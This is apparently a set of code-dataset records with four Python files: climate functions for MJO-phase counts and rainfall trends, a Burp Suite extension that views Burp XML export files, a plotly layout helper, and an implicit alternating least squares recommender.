rmm_single_phase = rmm_act.where(rmm_act.phase.isin(phase_nums))#, drop = True)\n # Resmapling via year, to get the number of days in each phase\n number_per_year = rmm_single_phase.phase.resample(time = 'y').count(dim = 'time')\n # Appending\n single_phase.append(number_per_year.values)\n\n\n\n '''Inactive Phase'''\n rmm_inact = rmm.where(rmm.amplitude <=1)# , drop = True)\n number_per_year_inact = rmm_inact.phase.resample(time = 'y').count(dim = 'time')\n\n single_phase.append(number_per_year_inact.values)\n\n titles = np.append(np.array([key for key in phase_dict.keys()]),['inactive'])\n\n datafile_RMM_split = xr.Dataset({'number':(('phase','year'), single_phase)},\n {'phase':titles,\n 'year': number_per_year.time.dt.year.values\n })\n \n \n# datafile_RMM_split = xr.concat(single_phase, pd.Index(titles, name = 'phase'))\n \n return datafile_RMM_split\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n\nimport mystats\n\n# Calculates the trend for each individaul grid cell\ndef grid_trend(x,t):\n # If every point is just a nan values. We don't want to do the polyfit calculation. Just return nan\n if np.all(np.isnan(x)):\n return float('nan')\n \n # Getting the gradient of a linear interpolation\n idx = np.isfinite(x) & np.isfinite(t) #checking where the nans are for both\n grad = np.polyfit(t[idx],x[idx],1)[0]\n return grad\n\ndef calculate_trend(percentile):\n \n # The axis number that year is\n axis_num = percentile.get_axis_num('year')\n \n '''Applying trends along each grid cell'''\n percentile_trend_meta = np.apply_along_axis(grid_trend,axis_num, percentile.values, \n t = percentile.year.values)\n\n '''Turning into an xarray dataset'''\n # Added in logic so that now data with or without phase vlaues \n # can be passed in. 
This works by creating dict with lat and lon.\n \n # List of the coordinates from the array itself\n coord_list = ['lat','lon']\n \n # The values to be used for each coordinates.\n coord_dict = {'lat':percentile.lat,'lon':percentile.lon}\n \n # If phase is also in the coord_list then we have to add this to the coord dict.\n # The reorder so that pahse is the first element in the dict.\n# print(list(percentile))/\n if 'phase' in list(percentile.coords):\n coord_dict['phase'] = percentile.phase.values\n coord_dict = {k:coord_dict[k] for k in ['phase','lat','lon']}\n # Adding phase too first element of coord list. \n coord_list = ['phase'] + coord_list\n \n# print('\\n')\n# print(coord_list)#, percentile_trend_meta.values.shape, coord_dict, sep = '\\n')\n \n trend = xr.Dataset({'trend':(coord_list, percentile_trend_meta)},\n coord_dict)\n return trend\n\ndef convert_to_percent_per_decade(percentile, trend):\n \n mean_gridcell = percentile.mean(dim = 'year')\n \n return (trend * 10 / mean_gridcell) * 100\n\ndef calculate_pvals(percentile, trend):\n year_num = percentile.get_axis_num('year')\n \n trend_pval_meta = np.apply_along_axis(mystats.mann_kendall, year_num, percentile)\n\n '''Turning into an xarray dataset'''\n # Added in logic so that now data with or without phase vlaues \n # can be passed in. This works by creating dict with lat and lon.\n \n # List of the coordinates from the array itself\n coord_list = ['lat','lon']\n \n # The values to be used for each coordinates.\n coord_dict = {'lat':percentile.lat,'lon':percentile.lon}\n \n # If phase is also in the coord_list then we have to add this to the coord dict.\n # The reorder so that pahse is the first element in the dict.\n if 'phase' in list(percentile.coords):\n coord_dict['phase'] = percentile.phase.values\n coord_dict = {k:coord_dict[k] for k in ['phase','lat','lon']}\n # Adding phase too first element of coord list. \n coord_list = ['phase'] + coord_list\n\n pvals = xr.Dataset({'pvals':(coord_list, trend_pval_meta)},\n coord_dict) \n \n return pvals\n\ndef significant_trend_calc(data, pvals):\n sig = data.where(np.logical_and(pvals.pvals >= 0 ,pvals.pvals <= 0.1))\n\n return sig\n\ndef return_alltrendinfo_custom(data, normalise = 0):\n import load_dataset as load\n\n if normalise == 'phase':\n rmm = load.load_rmm()\n rmm = wet_season_year(rmm)\n\n phase_count = count_in_rmm_phase(rmm)\n data = (data/phase_count.number)\n \n elif normalise == 'subphase':\n rmm = load.load_rmm()\n rmm = wet_season_year(rmm)\n subphase_count = count_in_rmm_subphase(rmm)\n\n data = (data/subphase_count.number)\n\n print('calculating trend', end = '')\n # Calculates the trend\n trend = calculate_trend(data)\n print(': complete')\n \n\n # Convertes to percent per decade\n print('converting to percent per decade', end = '')\n trend_percent = convert_to_percent_per_decade(data, trend)\n print(': complete')\n\n # Calculates the significant values\n print('finding significant points', end = '')\n pvals = calculate_pvals(data, trend)\n print(': complete')\n\n print('getting just significant trend points', end = '')\n trend_sig = significant_trend_calc(trend, pvals)\n trend_percent_sig = significant_trend_calc(trend_percent, pvals)\n print(': complete')\n\n return trend, trend_sig, trend_percent, trend_percent_sig","sub_path":"phase_calc_functions.py","file_name":"phase_calc_functions.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
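calculate_trend above applies the module's grid_trend along the year axis of each grid cell via np.apply_along_axis. On a toy two-cell series (synthetic data), the slope of a perfect line comes back as 2 and an all-NaN cell yields NaN:

    import numpy as np

    def grid_trend(x, t):                       # same per-cell slope as in the module
        if np.all(np.isnan(x)):
            return float('nan')
        idx = np.isfinite(x) & np.isfinite(t)
        return np.polyfit(t[idx], x[idx], 1)[0]

    years = np.arange(2000, 2005, dtype=float)
    cube = np.stack([2.0 * years + 1.0, np.full(5, np.nan)])   # 2 cells x 5 years
    print(np.apply_along_axis(grid_trend, 1, cube, t=years))   # ~[2. nan]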
+{"seq_id":"498097480","text":"from burp import IBurpExtender\nfrom burp import ITab\nfrom burp import IMessageEditorController\nfrom burp import IHttpRequestResponse\nfrom burp import IParameter\nfrom burp import IHttpService\n\nfrom java.awt import BorderLayout\nfrom java.util import ArrayList\nfrom java.util import Base64\n\nfrom javax.swing import JScrollPane\nfrom javax.swing import JSplitPane\nfrom javax.swing import JTabbedPane\nfrom javax.swing import JTable\nfrom javax.swing import JButton\nfrom javax.swing import JPanel\nfrom javax.swing import JFileChooser\n\nfrom javax.swing.table import AbstractTableModel\nfrom javax.xml.parsers import DocumentBuilderFactory\nfrom javax.xml.parsers import DocumentBuilder\n\nfrom threading import Lock\nfrom org.w3c.dom import Node\n\nclass BurpExtender(IBurpExtender, ITab, IMessageEditorController, AbstractTableModel):\n\t\n\t\"\"\"\n\t\tImplements IBurpExtender\n\t\"\"\"\n\n\tdef\tregisterExtenderCallbacks(self, callbacks):\n\t\t\n\t\t# Save callbacks and helpers for later use\n\t\tself._callbacks = callbacks\n\t\tself._helpers = callbacks.getHelpers()\n\t\t\n\t\t# Set extension name\n\t\tself._callbacks.setExtensionName(\"Burp XML Export Viewer\")\n\t\t\n\t\t# Create the log and a lock on which to synchronize when adding log entries\n\t\tself._log = ArrayList()\n\t\tself._lock = Lock()\n\t\t\n\t\t# Main panel\n\t\tself._mainPanel = JPanel(BorderLayout())\n\t\t\n\t\t# Button to load Burp XML Export file\n\t\tself._loadButton = JButton('Select Burp XML Export File')\n\t\tself._loadButton.addActionListener(self.loadButtonTapped)\n\t\tself._mainPanel.add(self._loadButton, BorderLayout.PAGE_START)\n\t\t\n\t\t# File chooser for Burp XML Export file\n\t\tself._fc = JFileChooser()\n\t\tself._fc.setDialogTitle(\"Select Burp XML Export File\")\n\t\t\n\t\t# Splitpane for table and request/response view\n\t\tself._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)\n\t\tself._mainPanel.add(self._splitpane, BorderLayout.CENTER)\n\t\t\n\t\t# Table of log entries\n\t\tself._logTable = Table(self)\n\t\tself._scrollPane = JScrollPane(self._logTable)\n\t\tself._splitpane.setTopComponent(self._scrollPane)\n\n\t\t# Set column width of table\n\t\tself._logTable.setAutoResizeMode(JTable.AUTO_RESIZE_OFF)\n\t\tself._logTable.getColumnModel().getColumn(0).setPreferredWidth(40)\n\t\tself._logTable.getColumnModel().getColumn(1).setPreferredWidth(60)\n\t\tself._logTable.getColumnModel().getColumn(2).setPreferredWidth(70)\n\t\tself._logTable.getColumnModel().getColumn(3).setPreferredWidth(300)\n\t\tself._logTable.getColumnModel().getColumn(4).setPreferredWidth(500)\n\t\tself._logTable.getColumnModel().getColumn(5).setPreferredWidth(300)\n\t\tself._logTable.getColumnModel().getColumn(6).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(7).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(8).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(9).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(10).setPreferredWidth(230)\n\t\tself._logTable.getColumnModel().getColumn(11).setMaxWidth(100000)\n\n\t\t# Tabs with request and response viewers\n\t\tself._tabs = JTabbedPane()\n\t\tself._requestViewer = callbacks.createMessageEditor(self, False)\n\t\tself._responseViewer = callbacks.createMessageEditor(self, False)\n\t\tself._tabs.addTab(\"Request\", self._requestViewer.getComponent())\n\t\tself._tabs.addTab(\"Response\", 
self._responseViewer.getComponent())\n\t\tself._splitpane.setBottomComponent(self._tabs)\n\t\t\n\t\t# Customize UI components\n\t\tself._callbacks.customizeUiComponent(self._mainPanel)\n\t\tself._callbacks.customizeUiComponent(self._splitpane)\n\t\tself._callbacks.customizeUiComponent(self._logTable)\n\t\tself._callbacks.customizeUiComponent(self._scrollPane)\n\t\tself._callbacks.customizeUiComponent(self._tabs)\n\t\t\n\t\t# Add the custom tab to Burp's UI\n\t\tself._callbacks.addSuiteTab(self)\n\t\t\n\t\treturn\n\t\n\t\"\"\"\n\t\tHelper Functions\n\t\"\"\"\n\t\n\tdef loadButtonTapped(self, actionEvent):\n\t\t\n\t\t# Display the file chooser dialog\n\t\tretVal = self._fc.showOpenDialog(None)\n\t\t\n\t\tif retVal == JFileChooser.APPROVE_OPTION:\n\t\t\tself._file = self._fc.getSelectedFile()\n\t\t\tself.resetList() # clear the table from all previous entries\n\t\t\tself.parseXML(self._file) # parse the file and load all entries to the table\n\t\telse:\n\t\t\tprint(\"Open command cancelled by user.\")\n\t\n\tdef parseXML(self, file):\n\t\t\n\t\t# Initialize XML stuff\n\t\tdbFactory = DocumentBuilderFactory.newInstance()\n\t\tdBuilder = dbFactory.newDocumentBuilder()\n\t\tdoc = dBuilder.parse(file)\n\t\tdoc.getDocumentElement().normalize()\n\t\t\n\t\t# All entries in Burp's XML Export File have tag - ...
\n\t\tnodeList = doc.getElementsByTagName(\"item\")\n\n\t\t# for i in reversed(range(0, nodeList.getLength())):\n\t\tfor i in range(0, nodeList.getLength()):\n\t\t\tnode = nodeList.item(i)\n\t\t\t\n\t\t\tif node.getNodeType() == Node.ELEMENT_NODE:\n\t\t\t\t\n\t\t\t\trequest = node.getElementsByTagName(\"request\").item(0).getTextContent()\n\t\t\t\tresponse = node.getElementsByTagName(\"response\").item(0).getTextContent()\n\n\t\t\t\trequest_isBase64 = node.getElementsByTagName(\"request\").item(0).getAttribute(\"base64\")\n\t\t\t\tresponse_isBase64 = node.getElementsByTagName(\"response\").item(0).getAttribute(\"base64\")\n\n\t\t\t\tif request_isBase64 == \"true\":\n\t\t\t\t\trequest = Base64.getDecoder().decode(request)\n\n\t\t\t\tif response_isBase64 == \"true\":\n\t\t\t\t\tresponse = Base64.getDecoder().decode(response)\n\n\t\t\t\tinfo = {\n\t\t\t\t\t\"time\" : node.getElementsByTagName(\"time\").item(0).getTextContent(),\n\t\t\t\t\t\"url\" : node.getElementsByTagName(\"url\").item(0).getTextContent(),\n\t\t\t\t\t\"host\" : node.getElementsByTagName(\"host\").item(0).getTextContent(),\n\t\t\t\t\t\"port\" : node.getElementsByTagName(\"port\").item(0).getTextContent(),\n\t\t\t\t\t\"protocol\" : node.getElementsByTagName(\"protocol\").item(0).getTextContent(),\n\t\t\t\t\t\"method\" : node.getElementsByTagName(\"method\").item(0).getTextContent(),\n\t\t\t\t\t\"path\" : node.getElementsByTagName(\"path\").item(0).getTextContent(),\n\t\t\t\t\t\"extension\" : node.getElementsByTagName(\"extension\").item(0).getTextContent(),\n\t\t\t\t\t\"request\" : request,\n\t\t\t\t\t\"status\" : node.getElementsByTagName(\"status\").item(0).getTextContent(),\n\t\t\t\t\t\"responselength\" : node.getElementsByTagName(\"responselength\").item(0).getTextContent(),\n\t\t\t\t\t\"mimetype\" : node.getElementsByTagName(\"mimetype\").item(0).getTextContent(),\n\t\t\t\t\t\"response\" : response,\n\t\t\t\t\t\"comment\" : node.getElementsByTagName(\"comment\").item(0).getTextContent(),\n\t\t\t\t\t\"highlight\" : \"\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tlogEntry = LogEntry(info)\n\n\t\t\t\t# Remove GET parameters from path component\n\t\t\t\t# Path component usually looks like this: /some/path/index.html?q=foo&z=faa\n\t\t\t\tinfo[\"path\"] = info[\"path\"].split(\"?\")[0]\n\n\t\t\t\t# Extract GET parameters\n\t\t\t\tparams = []\n\t\t\t\tfor param in self._helpers.analyzeRequest(logEntry).getParameters():\n\t\t\t\t\tif param.getType() == IParameter.PARAM_URL:\n\t\t\t\t\t\tparams.append(\"{}={}\".format(param.getName(), param.getValue()))\n\t\t\t\tinfo[\"params\"] = \"&\".join(params)\n\n\t\t\t\tself.addLogEntryToList(logEntry)\n\n\tdef addLogEntryToList(self, logEntry):\n\t\tself._lock.acquire()\n\t\trow = self._log.size()\n\t\tself._log.add(logEntry)\n\t\tself.fireTableRowsInserted(row, row)\n\t\tself._lock.release()\n\n\tdef resetList(self):\n\t\tself._lock.acquire()\n\t\tself._log.clear()\n\t\tself.fireTableRowsInserted(0,0)\n\t\tself._lock.release()\n\n\t\"\"\"\n\t\tImplements ITab\n\t\"\"\"\n\n\tdef getTabCaption(self):\n\t\treturn \"Burp XML Export Viewer\"\n\t\n\tdef getUiComponent(self):\n\t\treturn self._mainPanel\n\n\t\"\"\"\n\t\tExtends AbstractTableModel\n\t\"\"\"\n\n\tdef getRowCount(self):\n\t\ttry:\n\t\t\treturn self._log.size()\n\t\texcept:\n\t\t\treturn 0\n\n\tdef getColumnCount(self):\n\t\treturn 12\n\n\tdef getColumnName(self, columnIndex):\n\t\tif columnIndex == 0:\n\t\t\treturn \"#\"\n\t\tif columnIndex == 1:\n\t\t\treturn \"Method\"\n\t\tif columnIndex == 2:\n\t\t\treturn \"Protocol\"\n\t\tif columnIndex 
== 3:\n\t\t\treturn \"Host\"\n\t\tif columnIndex == 4:\n\t\t\treturn \"Path\"\n\t\tif columnIndex == 5:\n\t\t\treturn \"Parameters\"\n\t\tif columnIndex == 6:\n\t\t\treturn \"Status\"\n\t\tif columnIndex == 7:\n\t\t\treturn \"Length\"\n\t\tif columnIndex == 8:\n\t\t\treturn \"MIME type\"\n\t\tif columnIndex == 9:\n\t\t\treturn \"Extension\"\n\t\tif columnIndex == 10:\n\t\t\treturn \"Time\"\n\t\tif columnIndex == 11:\n\t\t\treturn \"Comment\"\n\t\t\n\t\treturn \"\"\n\n\tdef getValueAt(self, rowIndex, columnIndex):\n\t\tlogEntry = self._log.get(rowIndex)\n\t\t\n\t\tif columnIndex == 0:\n\t\t\treturn \"{}\".format(rowIndex)\n\t\tif columnIndex == 1:\n\t\t\treturn logEntry._info[\"method\"]\n\t\tif columnIndex == 2:\n\t\t\treturn logEntry._info[\"protocol\"]\n\t\tif columnIndex == 3:\n\t\t\treturn logEntry.getHttpService().getHost()\n\t\tif columnIndex == 4:\n\t\t\treturn logEntry._info[\"path\"]\n\t\tif columnIndex == 5:\n\t\t\treturn logEntry._info[\"params\"]\n\t\tif columnIndex == 6:\n\t\t\treturn logEntry._info[\"status\"]\n\t\tif columnIndex == 7:\n\t\t\treturn logEntry._info[\"responselength\"]\n\t\tif columnIndex == 8:\n\t\t\treturn logEntry._info[\"mimetype\"]\n\t\tif columnIndex == 9:\n\t\t\treturn logEntry._info[\"extension\"]\n\t\tif columnIndex == 10:\n\t\t\treturn logEntry._info[\"time\"]\n\t\tif columnIndex == 11:\n\t\t\treturn logEntry._info[\"comment\"]\n\t\t\n\t\treturn \"\"\n\n\t\"\"\"\n\t\tImplements IMessageEditorController\n\t\tAllows request and response viewers to obtain details about the messages being displayed\n\t\"\"\"\n\t\n\tdef getHttpService(self):\n\t\treturn self._currentlyDisplayedItem.getHttpService()\n\n\tdef getRequest(self):\n\t\treturn self._currentlyDisplayedItem.getRequest()\n\n\tdef getResponse(self):\n\t\treturn self._currentlyDisplayedItem.getResponse()\n\n\"\"\"\n\tExtends JTable\n\tHandles cell selection\n\"\"\"\n\t\nclass Table(JTable):\n\tdef __init__(self, extender):\n\t\tself._extender = extender\n\t\tself.setModel(extender)\n\t\n\tdef changeSelection(self, row, col, toggle, extend):\n\t\tlogEntry = self._extender._log.get(row)\n\t\tself._extender._requestViewer.setMessage(logEntry.getRequest(), True)\n\t\tself._extender._responseViewer.setMessage(logEntry.getResponse(), False)\n\t\tself._extender._currentlyDisplayedItem = logEntry\n\t\t\n\t\tJTable.changeSelection(self, row, col, toggle, extend)\n\n\"\"\"\n\tCustom class that represents individual log entry\n\tHolds details of each log entry that is displayed in table and request/response viewer\n\"\"\"\n\nclass LogEntry(IHttpRequestResponse):\n\tdef __init__(self, info):\n\t\tself._info = info\n\t\tself._httpService = HttpService(info[\"host\"], info[\"port\"], info[\"protocol\"])\n\t\tself._request = info[\"request\"]\n\t\tself._response = info[\"response\"]\n\t\tself._comment = info[\"comment\"]\n\t\tself._highlight = info[\"highlight\"]\n\n\tdef getRequest(self):\n\t\treturn self._request\n\n\tdef setRequest(self, request):\n\t\tself._request = request\n\n\tdef getResponse(self):\n\t\treturn self._response\n\n\tdef setResponse(self, response):\n\t\tself._response = response\n\n\tdef getComment(self):\n\t\treturn self._comment\n\n\tdef setComment(self, comment):\n\t\tself._comment = comment\n\n\tdef getHighlight(self):\n\t\treturn self._highlight\n\n\tdef setHighlight(self, highlight):\n\t\tself._highlight = highlight\n\n\tdef getHttpService(self):\n\t\treturn self._httpService\n\n\tdef setHttpService(self, httpService):\n\t\tself._httpService = httpService\n\nclass 
HttpService(IHttpService):\n\tdef __init__(self, host, port, protocol):\n\t\tself._host = host\n\t\tself._port = int(port)\n\t\tself._protocol = protocol\n\n\tdef getHost(self):\n\t\treturn str(self._host)\n\n\tdef getPort(self):\n\t\treturn int(self._port)\n\n\tdef getProtocol(self):\n\t\treturn str(self._protocol)\n","sub_path":"BurpXMLExportViewer.py","file_name":"BurpXMLExportViewer.py","file_ext":"py","file_size_in_byte":10951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
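The extension decodes request/response bodies only when the element's base64 attribute is "true". Outside Burp/Jython, the same attribute handling can be exercised with the standard library (xml.etree instead of the Java DOM used above; the XML snippet is a fabricated minimal example, not a full Burp export):

    import base64
    import xml.etree.ElementTree as ET

    raw = base64.b64encode(b"GET / HTTP/1.1").decode()
    doc = ET.fromstring('<items><item><host>example.com</host>'
                        '<request base64="true">' + raw + '</request></item></items>')
    item = doc.find('item')
    req = item.find('request')
    body = base64.b64decode(req.text) if req.get('base64') == 'true' else req.text
    print(item.find('host').text, body)   # example.com b'GET / HTTP/1.1'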
+{"seq_id":"403992022","text":"#!/usr/bin/env python\r\n\r\n\"\"\"My plot settings and methods.\r\n\r\nAuthor: Raul A. Flores\r\n\"\"\"\r\n\r\n#| - Import Modules\r\nimport plotly\r\n\r\n#__|\r\n\r\n# \"font\": {\r\n# \"family\": \"Courier New, monospace\",\r\n# \"size\": plot_title_size,\r\n# \"color\": \"black\",\r\n# },\r\n\r\n#| - Plotly\r\ndef reapply_colors(data):\r\n \"\"\"Redefines the line colors of a plotly data series.\r\n\r\n Groups by legend grouping, fix this it's not general enough\r\n\r\n Args:\r\n plotly data series (list of graph objects to be plotted)\r\n \"\"\"\r\n #| - reapply_colors\r\n from colors.colors import generate_color_palette\r\n\r\n dat_lst_master = data\r\n\r\n groups_list = []\r\n for series_i in dat_lst_master:\r\n groups_list.append(series_i.legendgroup)\r\n\r\n groups_list = list(set(groups_list))\r\n # print(groups_list)\r\n\r\n num_series = len(groups_list)\r\n colors = generate_color_palette(bins=num_series)\r\n\r\n new_list = []\r\n for color in colors:\r\n color_new = tuple([int(255 * x) for x in color])\r\n color_new = \"rgb\" + str(color_new)\r\n new_list.append(color_new.replace(\" \", \"\"))\r\n colors = new_list\r\n\r\n colors_dict = dict(zip(groups_list, colors))\r\n\r\n for series_i in dat_lst_master:\r\n tmp = colors_dict[series_i.legendgroup]\r\n\r\n series_i.marker[\"color\"] = tmp\r\n series_i.line[\"color\"] = tmp\r\n\r\n return(dat_lst_master)\r\n #__|\r\n\r\ndef plot_layout(\r\n # xax_labels =\r\n ):\r\n \"\"\"\r\n \"\"\"\r\n #| - plot_layout\r\n\r\n #| - Plot Settings\r\n plot_title_size = 18\r\n tick_lab_size = 16\r\n axes_lab_size = 18\r\n legend_size = 18\r\n #__|\r\n\r\n #| - Plot Layout\r\n xax_labels = [\"O2\", \"OOH\", \"O\", \"OH\", \"H2O\"]\r\n layout = {\r\n\r\n \"title\": \"FED of ORR Mechanism For Iron-Supported-Graphene\",\r\n\r\n \"font\": {\r\n \"family\": \"Courier New, monospace\",\r\n \"size\": plot_title_size,\r\n \"color\": \"black\",\r\n },\r\n\r\n #| - Axes --------------------------------------------------------------\r\n \"yaxis\": {\r\n \"title\": \"Free Energy [eV]\",\r\n \"zeroline\": True,\r\n \"titlefont\": dict(size=axes_lab_size),\r\n \"showgrid\": False,\r\n \"tickfont\": dict(\r\n size=tick_lab_size,\r\n ),\r\n },\r\n\r\n \"xaxis\": {\r\n \"title\": \"Reaction Coordinate\",\r\n \"zeroline\": True,\r\n \"titlefont\": dict(size=axes_lab_size),\r\n \"showgrid\": False,\r\n\r\n # \"showticklabels\": False,\r\n\r\n \"ticktext\": xax_labels,\r\n \"tickvals\": [1.5 * i + 0.5 for i in range(len(xax_labels))],\r\n\r\n \"tickfont\": dict(\r\n size=tick_lab_size,\r\n ),\r\n },\r\n #__| -------------------------------------------------------------------\r\n\r\n #| - Legend ------------------------------------------------------------\r\n \"legend\": {\r\n \"traceorder\": \"normal\",\r\n \"font\": dict(size=legend_size)\r\n },\r\n #__| -------------------------------------------------------------------\r\n\r\n #| - Plot Size\r\n \"width\": 200 * 4.,\r\n \"height\": 200 * 3.,\r\n #__|\r\n\r\n }\r\n #__|\r\n\r\n fig = Figure(data=dat_lst, layout=layout)\r\n # plotly.plotly.image.save_as(fig, filename=\"pl_hab_opda_raman.png\")\r\n\r\n plotly.offline.plot(\r\n {\r\n \"data\": dat_lst,\r\n \"layout\": layout,\r\n },\r\n filename=\"plots/pl_fed_supp_graph_02.html\"\r\n )\r\n\r\n # tmp = plotly.plotly.image.plot(data, filename=\"pl_fed_180314.png\")\r\n\r\n return(layout)\r\n\r\n 
#__|\r\n\r\n#__|\r\n","sub_path":"plotting/my_plotly.py","file_name":"my_plotly.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
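my_plotly.py builds its layout as a plain dict (fonts, axis titles, legend, size) and hands it to Figure; note that plot_layout references Figure and dat_lst without defining or importing them, so a real run needs something like the graph_objs import below. A minimal self-contained sketch of the same idea; the trace values and example.html are placeholders:

    import plotly.graph_objs as go

    layout = {
        "font": {"family": "Courier New, monospace", "size": 18, "color": "black"},
        "xaxis": {"title": "Reaction Coordinate", "showgrid": False},
        "yaxis": {"title": "Free Energy [eV]"},
    }
    fig = go.Figure(data=[go.Scatter(x=[0, 1, 2], y=[0.0, -0.4, -0.2])], layout=layout)
    # fig.write_html("example.html")  # offline render, analogous to plotly.offline.plot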
+{"seq_id":"571942188","text":"\"\"\" Implicit Alternating Least Squares \"\"\"\nimport itertools\nimport logging\nimport time\n\nimport numpy as np\n\nfrom . import _als\nfrom .recommender_base import RecommenderBase\nfrom .utils import check_open_blas, nonzeros\n\nlog = logging.getLogger(\"implicit\")\n\n\nclass AlternatingLeastSquares(RecommenderBase):\n \"\"\" A Recommendation Model based off the algorithms described in the paper 'Collaborative\n Filtering for Implicit Feedback Datasets' with perfomance optimizations described in\n 'Applications of the Conjugate Gradient Method for Implicit Feedback Collaborative\n Filtering.'\n \"\"\"\n def __init__(self, factors=100, regularization=0.01, dtype=np.float64,\n use_native=True, use_cg=True,\n iterations=15, calculate_training_loss=False, num_threads=0):\n # parameters on how to factorize\n self.factors = factors\n self.regularization = regularization\n\n # options on how to fit the model\n self.dtype = dtype\n self.use_native = use_native\n self.use_cg = use_cg\n self.iterations = iterations\n self.calculate_training_loss = calculate_training_loss\n self.num_threads = num_threads\n\n # learned parameters\n self.item_factors = None\n self.user_factors = None\n\n # cache of item norms (useful for calculating similar items)\n self._item_norms = None\n\n check_open_blas()\n\n def fit(self, item_users):\n \"\"\" Factorizes the matrix Cui. This must be called before trying to recommend items.\n After calling this method, the members 'user_factors' and 'item_factors' will be\n initialized with a latent factor model of the input data\n\n Args:\n item_users (csr_matrix): Matrix of confidences for the liked items. This matrix\n should be a csr_matrix where the rows of the matrix are the\n item, the columns are the users that liked that item, and the\n value is the confidence that the user liked the item.\n \"\"\"\n Ciu, Cui = item_users.tocsr(), item_users.T.tocsr()\n items, users = Ciu.shape\n\n # Initialize the variables randomly if they haven't already been set\n if self.user_factors is None:\n self.user_factors = np.random.rand(users, self.factors).astype(self.dtype) * 0.01\n if self.item_factors is None:\n self.item_factors = np.random.rand(items, self.factors).astype(self.dtype) * 0.01\n\n # invalidate cached norms\n self._item_norms = None\n\n solver = self.solver\n\n # alternate between learning the user_factors from the item_factors and vice-versa\n for iteration in range(self.iterations):\n s = time.time()\n solver(Cui, self.user_factors, self.item_factors, self.regularization,\n num_threads=self.num_threads)\n solver(Ciu, self.item_factors, self.user_factors, self.regularization,\n num_threads=self.num_threads)\n log.debug(\"finished iteration %i in %s\", iteration, time.time() - s)\n\n if self.calculate_training_loss:\n loss = _als.calculate_loss(Cui, self.user_factors, self.item_factors,\n self.regularization, num_threads=self.num_threads)\n log.debug(\"loss at iteration %i is %s\", iteration, loss)\n\n def recommend(self, userid, user_items, N=10, filter_items=None):\n \"\"\" Returns the top N ranked items for a single user \"\"\"\n scores = self.item_factors.dot(self.user_factors[userid])\n\n # calcualte the top N items, removing the users own liked items from the results\n liked = set(user_items[userid].indices)\n if filter_items:\n liked.update(filter_items)\n\n count = N + len(liked)\n if count < len(scores):\n ids = np.argpartition(scores, -count)[-count:]\n best = sorted(zip(ids, scores[ids]), key=lambda x: -x[1])\n else:\n 
best = sorted(enumerate(scores), key=lambda x: -x[1])\n return list(itertools.islice((rec for rec in best if rec[0] not in liked), N))\n\n def similar_items(self, itemid, N=10):\n \"\"\" Return the top N similar items for itemid. \"\"\"\n scores = self.item_factors.dot(self.item_factors[itemid]) / self.item_norms\n best = np.argpartition(scores, -N)[-N:]\n return sorted(zip(best, scores[best] / self.item_norms[itemid]), key=lambda x: -x[1])\n\n @property\n def item_norms(self):\n if self._item_norms is None:\n self._item_norms = np.linalg.norm(self.item_factors, axis=-1)\n return self._item_norms\n\n @property\n def solver(self):\n if self.use_cg:\n return _als.least_squares_cg if self.use_native else least_squares_cg\n return _als.least_squares if self.use_native else least_squares\n\n\ndef alternating_least_squares(Ciu, factors, **kwargs):\n \"\"\" factorizes the matrix Cui using an implicit alternating least squares\n algorithm. Note: this method is deprecated, consider moving to the\n AlternatingLeastSquares class instead\n\n \"\"\"\n log.warning(\"This method is deprecated. Please use the AlternatingLeastSquares\"\n \" class instead\")\n\n model = AlternatingLeastSquares(factors=factors, **kwargs)\n model.fit(Ciu)\n return model.item_factors, model.user_factors\n\n\ndef least_squares(Cui, X, Y, regularization, num_threads=0):\n \"\"\" For each user in Cui, calculate factors Xu for them\n using least squares on Y.\n\n Note: this is at least 10 times slower than the cython version included\n here.\n \"\"\"\n users, factors = X.shape\n YtY = Y.T.dot(Y)\n\n for u in range(users):\n # accumulate YtCuY + regularization*I in A\n A = YtY + regularization * np.eye(factors)\n\n # accumulate YtCuPu in b\n b = np.zeros(factors)\n\n for i, confidence in nonzeros(Cui, u):\n factor = Y[i]\n A += (confidence - 1) * np.outer(factor, factor)\n b += confidence * factor\n\n # Xu = (YtCuY + regularization * I)^-1 (YtCuPu)\n X[u] = np.linalg.solve(A, b)\n\n\ndef least_squares_cg(Cui, X, Y, regularization, num_threads=0, cg_steps=3):\n users, factors = X.shape\n YtY = Y.T.dot(Y) + regularization * np.eye(factors, dtype=Y.dtype)\n\n for u in range(users):\n # start from previous iteration\n x = X[u]\n\n # calculate residual error r = (YtCuPu - (YtCuY.dot(Xu)\n r = -YtY.dot(x)\n for i, confidence in nonzeros(Cui, u):\n r += (confidence - (confidence - 1) * Y[i].dot(x)) * Y[i]\n\n p = r.copy()\n rsold = r.dot(r)\n\n for it in range(cg_steps):\n # calculate Ap = YtCuYp - without actually calculating YtCuY\n Ap = YtY.dot(p)\n for i, confidence in nonzeros(Cui, u):\n Ap += (confidence - 1) * Y[i].dot(p) * Y[i]\n\n # standard CG update\n alpha = rsold / p.dot(Ap)\n x += alpha * p\n r -= alpha * Ap\n rsnew = r.dot(r)\n if rsnew < 1e-10:\n break\n p = r + (rsnew / rsold) * p\n rsold = rsnew\n\n X[u] = x\n","sub_path":"implicit/als.py","file_name":"als.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
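least_squares_cg above runs a few conjugate-gradient steps per user instead of a direct solve. Its alpha / x / r / rsnew-rsold updates are the textbook CG loop; on a small dense SPD system shaped like YtY + regularization*I (random stand-in data), that loop matches numpy's direct solver:

    import numpy as np

    rng = np.random.default_rng(0)
    M = rng.normal(size=(4, 4))
    A = M.T @ M + 0.1 * np.eye(4)      # SPD, analogous to YtY + regularization*I
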